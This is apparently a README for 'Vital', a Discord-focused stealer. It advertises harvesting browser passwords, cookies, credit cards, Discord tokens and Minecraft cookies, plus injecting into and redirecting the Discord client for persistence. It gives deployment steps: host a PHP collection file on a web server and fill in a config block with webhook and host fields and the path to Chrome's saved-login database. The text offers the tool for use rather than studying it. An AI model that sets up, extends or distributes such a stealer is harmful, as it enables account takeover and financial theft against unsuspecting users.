Malware for Discord, designed to steal passwords, tokens, and inject discord folders for long-term use.



  • What is Vital?

    Vital is malware primarily used to collect and extract information from the Discord desktop client. While it has other features (MC stealer, browser tools) it really shines in this area.

  • Overview of Vital

    Vital has the ability to steal browser passwords, cookies, and credit cards. It also collects Discord tokens, Minecraft client cookies and can redirect the Discord client to an alternative web address.

  • Support / coverage

    Vital supports a plethora of Discord clients and browsers, from commonly used browsers such as Chrome and Firefox to lesser used browsers such as (i don't know)


Setup a webserver on either a local machine or a remote machine, hosting the PHP file. Once you have your local server setup, make sure to configure everything properly inside of

  • Example
WEBHOOK 	    = 	''
REDIRECT 	    = 	''
HOST	 	    = 	''
CHROME_DATA 	    =   '\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data'
USERNAME	    =   os.environ.get('USERNAME')
APPDATA		    =   os.getenv('APPDATA')

DEBUG 		    = 	False

After this you can execute and watch the magic happen!

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